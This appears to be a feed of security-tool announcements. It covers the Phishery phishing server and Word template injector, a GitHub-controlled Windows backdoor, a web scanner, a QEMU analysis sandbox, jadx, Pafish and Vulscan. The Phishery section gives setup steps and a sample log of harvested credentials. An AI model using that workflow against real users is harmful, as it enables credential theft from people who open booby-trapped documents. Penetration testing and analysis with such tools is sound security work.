Phishery – An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector

Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.The power of phishery is best demonstrated by setting a Word document’s template to a phishery URL. This causes Microsoft Word to make a request to the URL, resulting in an Authentication Dialog being shown to the end-user. The ability to inject any .docx file with a URL is possible using phishery’s -i [in docx], -o [out docx], and -u [url] options.DownloadOperating system specific packages can be downloaded from here.InstallExtract the archive, and optionally, install binary to $PATH$ tar -xzvf phishery*.tar.gz$ cd phishery*$ cp phishery /usr/local/binUsage$ phishery –help|\ \\\\__ O __ _ __| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, / /_/ Basic Auth Credential Harvester (____/ with Word Doc Template Injector Start the server : phishery -s settings.json -c credentials.json Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx Options: -h, --help Show usage and exit. -v Show version and exit. -s The JSON settings file used to setup the server. [default: "settings.json"] -c The JSON file to store harvested credentials. [default: "credentials.json"] -u The phishery URL to use as the Word document template. -i The Word .docx file to inject with a template URL. -o The new Word .docx file with the injected template URL.Running the serverModify the provided settings.json file as needed, by default it should look like this:{ "ip": "0.0.0.0", "port": "443", "sslCert": "server.crt", "sslKey": "server.key", "basicRealm": "Secure Document Gateway", "responseStatus": 200, "responseFile": "template.dotx", "responseHeaders": [ ["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"] ]}This setup will start the HTTP server on Port 443 with SSL configured to use server.crt and server.key. The basic authentication realm is set to Secure Document Gateway. When any credentials are provided, a 200 response status is sent along with the contents of the included template.dotx and the content type header: Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.The settings file may also be configured to output a simple body, by using responseBody, like this:{ "ip": "0.0.0.0", "port": "443", "sslCert": "server.crt", "sslKey": "server.key", "basicRealm": "Secure Document Gateway", "responseStatus": 404, "responseBody": "<h1>Not Found</h1>", "responseHeaders": [ ["Content-Type", "text/html"] ]}The effectiveness of this tool is based mostly on the Domain and Basic Auth Realm used, as that is often all the end user will see when triggered from an Office document. Make sure to point your DNS A Records the public IP of the phishery server.It’s recommended that the provided cert is replaced with a trusted one, such as one generated with LetsEncrypt. Microsoft Word on OS X will prevent the auth dialog if the cert is invalid, and Microsoft Word on Windows will prompt the user to accept the invalid certificate.Once the server is configured and running, all you need to do is embed a phishery URL in a document, or anywhere else your heart desires. phishery does give you the ability to inject your URL into a Word document as a template, instructions on how to do this can be found below.Injecting a Word DocumentTo inject a Word document with a template URL, you’ll need a .docx file and the phishery server URL.Now run phishery with your document and URL:$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx[+] Opening Word document: good.docx[+] Setting Word document template to: https://secure.site.local/docs[+] Saving injected Word document to: bad.docx[*] Injected Word document has been saved!Make sure your phishery server is running and available at the URL you used. Now when the Word document is opened, the victim will be prompted with an authentication dialog.Now when the victim opens the document, you’ll see the following:$ ./phishery[+] Credential store initialized at: credentials.json[+] Starting HTTPS Auth Server on: 0.0.0.0:443[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs[*] Sending Basic Auth response to: 127.0.0.1[*] New credentials harvested![HTTP] Host : secure.example.local[HTTP] Request : /docs[HTTP] User Agent : Microsoft Office Word[HTTP] IP Address : 127.0.0.1[AUTH] Username : john.doe[AUTH] Password : Summer15Download Phishery

Link: http://feedproxy.google.com/~r/PentestTools/~3/8yZkOBfr-eM/phishery-ssl-enabled-basic-auth.html

A stealthy Python based Windows backdoor that uses Github as a C&C server

CanisRufus is a stealthy Python based Windows backdoor that uses Github as a command and control server. – https://github.com/maldevel/canisrufus The red wolf (Canis rufus or Canis lupus rufus), also known as the Florida wolf or Mississippi Valley wolf, is a canid of unresolved taxonomic identity native to the eastern United States. It is generally, morphologically, …

Link: http://securityblog.gr/4434/a-stealthy-python-based-windows-backdoor-that-uses-github-as-a-cc-server/

Spaghetti – Web Application Security Scanner

Spaghetti is a web application security scanner tool. It is designed to find various default and insecure files, configurations and misconfigurations. Spaghetti is built on python2.7 and can run on any platform which has a Python environment.Installation$ git clone https://github.com/m4ll0k/Spaghetti.git$ cd Spaghetti $ pip install -r doc/requirements.txt$ python spaghetti.py -h Features Fingerprints ServerFrameworks (CakePHP,CherryPy,Django,…)Firewall (Cloudflare,AWS,Barracuda,…)CMS (Drupal,Joomla,Wordpress)OS (Linux,Unix,Windows,…)Language (PHP,Ruby,Python,ASP,…) Discovery: Admin PanelApache Enumeration UsersApache XSSApache ModStatusBackdoorsBackupCaptchaCommon DirectoriesCommon FilesCookie SecurityMultiple IndexInformation Disclosure (Emails and Private IP)ScreenshotsDownload Spaghetti

Link: http://feedproxy.google.com/~r/PentestTools/~3/7AbCbuhmLRs/spaghetti-web-application-security.html

PyREBox – Python scriptable Reverse Engineering Sandbox

PyREBox is a Python scriptable Reverse Engineering sandbox. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective. PyREBox allows to inspect a running QEMU VM, modify its memory or registers, and to instrument its execution, by creating simple scripts in python to automate any kind of analysis. QEMU (when working as a whole-system-emulator) emulates a complete system (CPU, memory, devices…). By using VMI techniques, it does not require to perform any modification into the guest operating system, as it transparently retrieves information from its memory at run-time.Several academic projects such as DECAF, PANDA, S2E, or AVATAR, have previously leveraged QEMU based instrumentation to overcome reverse engineering tasks. These projects allow to write plugins in C/C++, and implement several advanced features such as dynamic taint analysis, symbolic execution, or even record and replay of execution traces. With PyREBox, we aim to apply this technology focusing on keeping the design simple, and on the usability of the system for threat analysts. DocumentationThe documentation of this project is hosted at readthedocs.io. GoalsProvide a whole system emulation platform with a simple interface for inspecting the emulated guest system.Fine grained instrumentation of system events.Integrated Virtual Machine Introspection (VMI), based on volatility. No agent or driver needs to be installed into the guest.An IPython based shell interface.A Python based scripting engine, that allows to integrate into the scripts any of the security tools based on this language (one of the biggest ecosystems).Have a clean design, de-coupled from QEMU. Many projects that are built over QEMU do not evolve when QEMU gets upgraded, missing new features and optimizations, as well as security updates. In order to achieve this, PyREBox is implemented as an independent module that can be compiled together with QEMU requiring a minimal set of modifications.Support for different architectures. Currently, PyREBox only supports Windows for x86 and x86-64 bit architectures, but its design allows to support other architectures such as ARM, MIPS, or PowerPC, and other operating systems as well. IPython shellStarting a PyREBox shell is as easy as typing the sh command on QEMU’s monitor. It will immediately start an IPython shell. This shell records the command history as well as the defined variables. For instance, you can save a value and recover it later at a different point of the execution, when you start the shell again. PyREBox takes advantage of all the available features in IPython such as auto-completion, command history, multi-line editing, and automated command help generation.PyREBox will allow you to debug the system (or a process) in a fairly stealthy way. Unlike traditional debuggers which stay in the system being debugged (even modifying the memory of the debugged process to insert breakpoints), PyREBox stays completely outside the inspected system, and it does not require the installation of any driver or component into the guest.PyREBox offers a complete set of commands to inspect and modify the state of the running VM. Just type list_commands to obtain a complete list. You can run any volatility plugin just by typing vol and the corresponding volatility command. For a complete list of available volatility plugins, you can type list_vol_commands. This list is generated automatically, so it will also show any volatility plugin you install on PyREBox’s volatility/ path.You can also define your own commands! It is as simple as declaring a function in a script, and loading it.If you need something more expressive than a command, you can write a Python snippet leveraging the API. For a detailed description of the API, see Documentation or type help(api) in the shell. ScriptingPyREBox allows to dynamically load scripts that can register callback functions that are called when certain events occur, like instructions executed, memory read/written, processes created/destroyed, and so on.Given that PyREBox is integrated with Volatility, it will let you take advantage of all the volatility plugins for memory forensics in your python scripts. Many of the most famous reverse engineering tools are implemented in Python or at least have Python bindings. Our approach allows to integrate any of these tools into a script.Finally, given that python callbacks can introduce a performance penalty on frequent events such as instructions executed, it is also possible to create triggers. Triggers are native-code plug-in’s (developed in C/C++) that can be inserted dynamically at run-time on any event just before the Python callback is executed. This allows to limit the number of events that hit the python code, as well as to precompute values in native code.In this repository you will find example scripts that can help you to write your owncode . InstallA build script is provided. For specific details about dependencies, please see BUILD. We also provide a Dockerfile. Starting a VMPyREBox is based on QEMU, so in order to start a VM withing PyREBox, you need to run it exactly as you were booting up a QEMU VM. A couple of example scripts are provided: start_i386.sh, start_x86_64.sh, you can use them as an example.The only QEMU monitor option supported currently is stdio (-monitor stdio). RoadmapVM image configuration and management console.Support for ARM, MIPS, and other architectures.Support for GNU/Linux guest systems. AcknowledgementFirst of all, PyREBox would not be possible without QEMU and Volatility. We thank to their developers and maintainers for such a great work.PyREBox is inspired by several academic projects, such as DECAF, or PANDA. In fact, many of the callbacks supported by PyREBox are equivalent to those found in DECAF, and the concepts behind the instrumentation are based on these works.PyREBox benefits from third-party code, which can be found under the directory pyrebox/third_party. For each third-party project, we include an indication of its original license, the original source code files taken from the project, as well as the modified versions of the source code files (if applicable), used by PyREBox. Bugs and supportIf you think you’ve found a bug, please report it here.This program is provided “AS IS", and no support is guaranteed. That said, in order to help us solve your issues, please include as much information as possible in order to reproduce the bug:Operating system used to compile and run PyREBox.The specific operating system version and emulation target you are using.Shell command / script / task you were trying to run.Any information about the error such as error messages, Python (or IPython) stack trace, or QEMU stack trace.Any other relevant informationDownload PyREBox

Link: http://feedproxy.google.com/~r/PentestTools/~3/W9LGHKvbT1Q/pyrebox-python-scriptable-reverse.html

jadx – Dex to Java Decompiler

jadx – Dex to Java decompilerCommand line and GUI tools for produce Java source code from Android Dex and Apk files.Building from sourcegit clone https://github.com/skylot/jadx.gitcd jadx./gradlew dist(on Windows, use gradlew.bat instead of ./gradlew)Scripts for run jadx will be placed in build/jadx/bin and also packed to build/jadx-.zipRunRun jadx on itself:cd build/jadx/bin/jadx -d out lib/jadx-core-*.jar#orbin/jadx-gui lib/jadx-core-*.jarUsagejadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)options: -d, –output-dir – output directory -j, –threads-count – processing threads count -r, –no-res – do not decode resources -s, –no-src – do not decompile source code -e, –export-gradle – save as android gradle project –show-bad-code – show inconsistent code (incorrectly decompiled) –no-replace-consts – don’t replace constant value with matching constant field –escape-unicode – escape non latin characters in strings (with \u) –deobf – activate deobfuscation –deobf-min – min length of name –deobf-max – max length of name –deobf-rewrite-cfg – force to save deobfuscation map –deobf-use-sourcename – use source file name as class name alias –cfg – save methods control flow graph to dot file –raw-cfg – save methods control flow graph (use raw instructions) -f, –fallback – make simple dump (using goto instead of ‘if’, ‘for’, etc) -v, –verbose – verbose output -h, –help – print this helpExample: jadx -d out classes.dexTroubleshootingOut of memory error:Reduce processing threads count (-j option)Increase maximum java heap size: command line (example for linux): JAVA_OPTS=”-Xmx4G" jadx -j 1 some.apkedit ‘jadx’ script (jadx.bat on Windows) and setup bigger heap size: DEFAULT_JVM_OPTS="-Xmx2500M"ContributionTo support this project you can:Post thoughts about new features/optimizations that important to youSubmit bug using one of following patterns: Java code examples which decompiles incorrectlyError log and link to public available apk file or app page on Google playDownload jadx

Link: http://feedproxy.google.com/~r/PentestTools/~3/XWyUlBS3OWk/jadx-dex-to-java-decompiler.html

Pafish – Tool to Detect Sandboxes and Analysis Environments in the Same Way as Malware Families Do

Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.The project is open source, you can read the code of all anti-analysis checks.ScopeThe objective of this project is to collect usual tricks seen in malware samples. This allows us to study them, and test if our analysis environments are properly implemented.BuildPafish is written in C and can be built with MinGW (gcc + make).Check out “How to build" for detailed instructions.AuthorAlberto Ortega (@a0rtega – profile)You can also download the executable of the latest stable version.Download Pafish

Link: http://feedproxy.google.com/~r/PentestTools/~3/fbdDIoZi0go/pafish-tool-to-detect-sandboxes-and.html

Vulscan – Advanced vulnerability scanning with Nmap NSE

Vulscan is a module which enhances nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.InstallationPlease install the files into the following folder of your Nmap installation:Nmap\scripts\vulscan\*UsageYou have to run the following minimal command to initiate a simple vulnerability scan:nmap -sV –script=vulscan/vulscan.nse www.example.comVulnerability DatabaseThere are the following pre-installed databases available at the moment:scipvuldb.csv – https://vuldb.comcve.csv – http://cve.mitre.orgosvdb.csv – http://www.osvdb.orgsecurityfocus.csv – http://www.securityfocus.com/bid/securitytracker.csv – http://www.securitytracker.comxforce.csv – http://xforce.iss.netexpliotdb.csv – http://www.exploit-db.comopenvas.csv – http://www.openvas.orgSingle Database ModeYou may execute vulscan with the following argument to use a single database:–script-args vulscandb=your_own_databaseIt is also possible to create and reference your own databases. This requires to create a database file, which has the following structure:;<title>Just execute vulscan like you would by refering to one of the pre-delivered databases. Feel free to share your own database and vulnerability connection with me, to add it to the official repository.Update DatabaseThe vulnerability databases are updated and assembled on a regularly basis. To support the latest disclosed vulnerabilities, keep your local vulnerability databases up-to-date.If you want to update your databases, go to the following web site and download these files:http://www.computec.ch/projekte/vulscan/download/cve.csvhttp://www.computec.ch/projekte/vulscan/download/exploitdb.csvhttp://www.computec.ch/projekte/vulscan/download/openvas.csvhttp://www.computec.ch/projekte/vulscan/download/osvdb.csvhttp://www.computec.ch/projekte/vulscan/download/scipvuldb.csvhttp://www.computec.ch/projekte/vulscan/download/securityfocus.csvhttp://www.computec.ch/projekte/vulscan/download/securitytracker.csvhttp://www.computec.ch/projekte/vulscan/download/xforce.csvCopy the files into your vulscan folder:/vulscan/Version DetectionIf the version detection was able to identify the software version and the vulnerability database is providing such details, also this data is matched.Disabling this feature might introduce false-positive but might also eliminate false-negatives and increase performance slighty. If you want to disable additional version matching, use the following argument:–script-args vulscanversiondetection=0Version detection of vulscan is only as good as Nmap version detection and the vulnerability database entries are. Some databases do not provide conclusive version information, which may lead to a lot of false-positives (as can be seen for Apache servers).Match PriorityThe script is trying to identify the best matches only. If no positive match could been found, the best possible match (with might be a false-positive) is put on display.If you want to show all matches, which might introduce a lot of false-positives but might be useful for further investigation, use the following argument:–script-args vulscanshowall=1Interactive ModeThe interactive mode helps you to override version detection results for every port. Use the following argument to enable the interactive mode:–script-args vulscaninteractive=1ReportingAll matching results are printed one by line. The default layout for this is:[{id}] {title}\nIt is possible to use another pre-defined report structure with the following argument:–script-args vulscanoutput=details–script-args vulscanoutput=listid–script-args vulscanoutput=listlink–script-args vulscanoutput=listtitleYou may enforce your own report structure by using the following argument (some examples):–script-args vulscanoutput='{link}\n{title}\n\n’–script-args vulscanoutput=’ID: {id} – Title: {title} ({matches})\n’–script-args vulscanoutput='{id} | {product} | {version}\n’Supported are the following elements for a dynamic report template:{id} – ID of the vulnerability{title} – Title of the vulnerability{matches} – Count of matches{product} – Matched product string(s){version} – Matched version string(s){link} – Link to the vulnerability database entry\n – Newline\t – TabEvery default database comes with an url and a link, which is used during the scanning and might be accessed as {link} within the customized report template. To use custom database links, use the following argument:–script-args “vulscandblink=http://example.org/{id}"DisclaimerKeep in mind that this kind of derivative vulnerability scanning heavily relies on the confidence of the version detection of nmap, the amount of documented vulnerebilities and the accuracy of pattern matching. The existence of potential flaws is not verified with additional scanning nor exploiting techniques.Download Vulscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/xg1kANuJANQ/vulscan-advanced-vulnerability-scanning.html